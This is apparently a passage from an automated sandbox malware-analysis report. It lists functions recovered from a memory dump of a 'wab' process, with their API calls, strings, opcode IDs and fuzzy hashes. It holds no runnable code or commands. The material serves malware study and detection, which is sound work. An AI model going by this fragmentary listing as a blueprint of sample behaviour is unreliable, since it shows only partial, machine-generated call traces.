                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408362
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00408377
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$ByteCharMultiWide
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 290601579-0
                                                                                                                                                                                                                      • Opcode ID: 9fcfede22a014af3fd00fd09d6ecb3c0f5450144b585b651b49c2714cfacc533
                                                                                                                                                                                                                      • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9fcfede22a014af3fd00fd09d6ecb3c0f5450144b585b651b49c2714cfacc533
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00444E84 Relevance: 15.2, APIs: 8, Strings: 2, Instructions: 183COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy$memchrmemset
                                                                                                                                                                                                                      • String ID: PD$PD
                                                                                                                                                                                                                      • API String ID: 1581201632-2312785699
                                                                                                                                                                                                                      • Opcode ID: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                                                      • Instruction ID: 10fb1f61a141a907ee6ef334180a592a84e160db04a0c58349e49e3250f7ff3f
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6e8d3b6fa2ff374e13542a5a9ce1d141d502757749890083bc1aee29b95d613b
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8D5192719002196BDF10EF69CC85EEEBBBCAF45304F0444ABE555E7246E738E648CBA4
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00409F42 Relevance: 15.1, APIs: 10, Instructions: 103COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000011), ref: 00409F5B
                                                                                                                                                                                                                      • GetSystemMetrics.USER32(00000010), ref: 00409F61
                                                                                                                                                                                                                      • GetDC.USER32(00000000), ref: 00409F6E
                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,00000008), ref: 00409F7F
                                                                                                                                                                                                                      • GetDeviceCaps.GDI32(00000000,0000000A), ref: 00409F86
                                                                                                                                                                                                                      • ReleaseDC.USER32(00000000,00000000), ref: 00409F8D
                                                                                                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 00409FA0
                                                                                                                                                                                                                      • GetParent.USER32(?), ref: 00409FA5
                                                                                                                                                                                                                      • GetWindowRect.USER32(00000000,00000000), ref: 00409FC2
                                                                                                                                                                                                                      • MoveWindow.USER32(?,?,?,?,?,00000001), ref: 0040A021
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Window$CapsDeviceMetricsRectSystem$MoveParentRelease
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 2163313125-0
                                                                                                                                                                                                                      • Opcode ID: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                      • Instruction ID: e27d49e141fc924f5dc8bb17b5c2b7dfe0ac862298cc10f95babd1b5c1aaa95e
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d78dd9667733c118ca5f823c40f75fbf68f042a28012a42387a4e68ecbaebf7d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66318475A00209AFDF14CFB9CD85AEEBBB9FB48354F050579E901F3290DA70ED458A50
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004028E7 Relevance: 14.2, APIs: 7, Strings: 1, Instructions: 190COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??3@$wcslen
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 239872665-3916222277
                                                                                                                                                                                                                      • Opcode ID: eaee59aa1960e0bc6b139c79bf1b9906f069cc1c4e9a2a0e216f6cb737749aeb
                                                                                                                                                                                                                      • Instruction ID: 6c84a66137f0c35b9d0eb965e4703c645d554f15bb1c6f80accdbf0b715e4580
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eaee59aa1960e0bc6b139c79bf1b9906f069cc1c4e9a2a0e216f6cb737749aeb
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 78614A70E0421ADADF28AF95E6485EEB771FF04315F60807BE411B62D1EBB84981CB5D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040A45A Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 65COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpywcslen$_snwprintfmemset
                                                                                                                                                                                                                      • String ID: %s (%s)$YV@
                                                                                                                                                                                                                      • API String ID: 3979103747-598926743
                                                                                                                                                                                                                      • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                                                      • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 004044A4 Relevance: 14.1, APIs: 4, Strings: 4, Instructions: 52libraryloaderwindowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                                                                                                                                                                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 004044D5
                                                                                                                                                                                                                      • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                                                                                                                                                                                      • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: Library$AddressFreeLoadMessageProc
                                                                                                                                                                                                                      • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                                                                                                                                                                                      • API String ID: 2780580303-317687271
                                                                                                                                                                                                                      • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                                      • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040A661 Relevance: 14.1, APIs: 6, Strings: 2, Instructions: 52librarywindowCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                                                                                                                                                                                      • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                                                                                                                                                                                      • wcslen.MSVCRT ref: 0040A6B1
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A6C1
                                                                                                                                                                                                                      • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040A6DB
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                                                                                                                                                                                      • String ID: Unknown Error$netmsg.dll
                                                                                                                                                                                                                      • API String ID: 2767993716-572158859
                                                                                                                                                                                                                      • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                                                      • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040DAE1 Relevance: 14.0, APIs: 3, Strings: 5, Instructions: 42COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 00409B98: GetFileAttributesW.KERNELBASE(?,00445E12,?,?,?,00000104), ref: 00409B9C
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DAFB
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040DB0B
                                                                                                                                                                                                                      • GetPrivateProfileIntW.KERNEL32(0045D668,rtl,00000000,0045D458), ref: 0040DB1C
                                                                                                                                                                                                                        • Part of subcall function 0040D65D: GetPrivateProfileStringW.KERNEL32(0045D668,?,0044E518,0045D6F8,?,0045D458), ref: 0040D679
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: PrivateProfilewcscpy$AttributesFileString
                                                                                                                                                                                                                      • String ID: TranslatorName$TranslatorURL$charset$general$rtl
                                                                                                                                                                                                                      • API String ID: 3176057301-2039793938
                                                                                                                                                                                                                      • Opcode ID: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                                                      • Instruction ID: a06b33177ff8c9e83df2ed587696004ed0fecc3b70d630751f385571f4afffd7
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 3fbe58534c285a30a84b282ab535004845ea1880fa40ce6c2a5f8ae528691bae
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A8F0F661EC061236D2213A761C07F2E26149FA3B93F05447BBC08771C7CA7E4A4DC69E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0042F5F4 Relevance: 13.8, APIs: 2, Strings: 7, Instructions: 250COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                                                                                                                                                                                      • database is already attached, xrefs: 0042F721
                                                                                                                                                                                                                      • unable to open database: %s, xrefs: 0042F84E
                                                                                                                                                                                                                      • database %s is already in use, xrefs: 0042F6C5
                                                                                                                                                                                                                      • cannot ATTACH database within transaction, xrefs: 0042F663
                                                                                                                                                                                                                      • out of memory, xrefs: 0042F865
                                                                                                                                                                                                                      • too many attached databases - max %d, xrefs: 0042F64D
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpymemset
                                                                                                                                                                                                                      • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                                                                                                                                                                                      • API String ID: 1297977491-2001300268
                                                                                                                                                                                                                      • Opcode ID: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
                                                                                                                                                                                                                      • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7e4b554c6cf2a7725b65294c40743cfb8927ad1f348c936232134d76ba50cb5c
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040EAFF Relevance: 13.7, APIs: 7, Strings: 2, Instructions: 160COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8EC
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E8FA
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E90B
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E922
                                                                                                                                                                                                                        • Part of subcall function 0040E8E0: ??3@YAXPAX@Z.MSVCRT ref: 0040E92B
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EB3F
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EB5B
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040EB80
                                                                                                                                                                                                                      • memcpy.MSVCRT ref: 0040EB94
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC17
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC21
                                                                                                                                                                                                                      • ??2@YAPAXI@Z.MSVCRT ref: 0040EC59
                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                        • Part of subcall function 0040D134: LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                                                                                                                                                                                        • Part of subcall function 0040D134: memcpy.MSVCRT ref: 0040D24C
                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                        • Part of subcall function 0040D134: wcslen.MSVCRT ref: 0040D1D3
                                                                                                                                                                                                                        • Part of subcall function 0040D134: GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: ??2@??3@$memcpy$HandleModule$LoadStringwcscpywcslen
                                                                                                                                                                                                                      • String ID: ($d
                                                                                                                                                                                                                      • API String ID: 1140211610-1915259565
                                                                                                                                                                                                                      • Opcode ID: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                                                                                                                      • Instruction ID: 92dd2811bdb74a70ba85f750b5b6098557f3982e7a927aadba8bcdb4291d1afd
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2d8781ba105db3adf58cafe694f4c442d3862c9e44634e011589b3902fbf09db
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D7518D71601704AFD724DF2AC586A5AB7F8FF48314F10892EE55ACB381DB75E9408B48
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00417887 Relevance: 13.6, APIs: 9, Instructions: 126filesleepCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • LockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004178DF
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000001), ref: 004178E9
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 004178FB
                                                                                                                                                                                                                      • UnlockFile.KERNEL32(?,40000000,00000000,00000001,00000000), ref: 004179D3
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$ErrorLastLockSleepUnlock
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3015003838-0
                                                                                                                                                                                                                      • Opcode ID: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                                      • Instruction ID: bb7e89fefddb53edf96b8819cb9ac805ac4f8ca395f1f2490f4f27a155f14dd5
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2bcaca4b1abb42dedd91daaceb1976ea0637d726691221ef1964d55ebaf63db6
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C741FFB515C3029FE3209F219C05BA7B7F1BFC4714F20092EF5A556280CBB9D8898A6E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00407E1E Relevance: 13.6, APIs: 9, Instructions: 115COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00407E44
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00407E5B
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 00407E7E
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 00407ED7
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 00407EEE
                                                                                                                                                                                                                      • _mbscpy.MSVCRT ref: 00407F01
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00407F10
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F36
                                                                                                                                                                                                                      • MultiByteToWideChar.KERNEL32(0000FDE9,00000000,?,000000FF,?,000003FF), ref: 00407F50
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: _mbscpy$ByteCharMultiWidememset$wcscpy
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 59245283-0
                                                                                                                                                                                                                      • Opcode ID: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                                                      • Instruction ID: 836b70714d1948736637452a130addde846eabb024256fa404d9b75b59221f05
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2093e6e2fb276f324a3f34c95e94e469d6ba5033b990a3802bc2c4c250056f76
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 2F4130B5900218AFDB20EB65CC81FDAB7FCBB09354F0085AAF559E7241DB34AB488F55
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0041851E Relevance: 13.6, APIs: 9, Instructions: 67sleepfileCOMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • DeleteFileW.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 00418548
                                                                                                                                                                                                                      • GetFileAttributesW.KERNEL32(00000000), ref: 0041854F
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041855C
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 00418571
                                                                                                                                                                                                                      • DeleteFileA.KERNEL32(00000000,?,00000000,00000080,0045DBC0,00417C3A,00000000,?,00000000,00000000), ref: 0041857A
                                                                                                                                                                                                                      • GetFileAttributesA.KERNEL32(00000000), ref: 00418581
                                                                                                                                                                                                                      • GetLastError.KERNEL32 ref: 0041858E
                                                                                                                                                                                                                      • Sleep.KERNEL32(00000064), ref: 004185A3
                                                                                                                                                                                                                      • ??3@YAXPAX@Z.MSVCRT ref: 004185AC
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: File$AttributesDeleteErrorLastSleep$??3@
                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                      • API String ID: 3467550082-0
                                                                                                                                                                                                                      • Opcode ID: a2b6c81e445c0bb2a448697a9242f501ac6bdbc43e5116fd898be029f04e29f8
                                                                                                                                                                                                                      • Instruction ID: d61f765991b085217c17e58d7c3851c8d0f597f546fc635256e60a728691d00d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: a2b6c81e445c0bb2a448697a9242f501ac6bdbc43e5116fd898be029f04e29f8
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A011C639540624BBC61027716CC89BE3676E75B335B210A2EFA22912D0DF6C4CC2557E
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00414E7F Relevance: 13.6, APIs: 3, Strings: 6, Instructions: 63COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memcpy
                                                                                                                                                                                                                      • String ID: &amp;$&deg;$&gt;$&lt;$&quot;$<br>
                                                                                                                                                                                                                      • API String ID: 3510742995-3273207271
                                                                                                                                                                                                                      • Opcode ID: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                      • Instruction ID: c5e12263314fdcdd46b54c12ab2af12db27c873e0c2922b0206687d3a4296adb
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 369a3f9b1fd6758dbfbd8abebbf452156f2c7f188bb79599d954c26419b7cbea
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A601F576F8032071EA3020058C46FF70558FBF2B1AFA20127FD86292D5D28D0AC7929F
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 00413A3F Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 141COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • OpenProcess.KERNEL32(00000410,00000000,00000000,?,?,00000000,?,004133E1,00000000,?), ref: 00413A7A
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413ADC
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413AEC
                                                                                                                                                                                                                        • Part of subcall function 00413959: wcscpy.MSVCRT ref: 00413982
                                                                                                                                                                                                                      • memset.MSVCRT ref: 00413BD7
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 00413BF8
                                                                                                                                                                                                                      • CloseHandle.KERNEL32(?,3A,?,?,?,004133E1,00000000,?), ref: 00413C4E
                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                      • Source File: 00000009.00000002.40252855810.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                      • Snapshot File: hcaresult_9_2_400000_wab.jbxd
                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                      • API ID: memset$wcscpy$CloseHandleOpenProcess
                                                                                                                                                                                                                      • String ID: 3A
                                                                                                                                                                                                                      • API String ID: 3300951397-293699754
                                                                                                                                                                                                                      • Opcode ID: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                                                      • Instruction ID: 1dd795ac5698d536b98d54c3d0ab6bca04534a71b571f2ddc62e59a9adc8dd8d
                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 8542788a6fbd662e622ac6317d91a932690acc9b8880ba19fbfc79209a0c02cc
                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3C514D71108341AFD720DF25DC84ADBB7E8FF84705F004A2EF59992291EB75DA44CBAA
                                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                                      Function 0040D134 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 104COMMON
                                                                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                                                                      APIs
                                                                                                                                                                                                                      • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                                                                                                                                                                                      • wcscpy.MSVCRT ref: 0040D1B5
                                                                                                                                                                                                                        • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
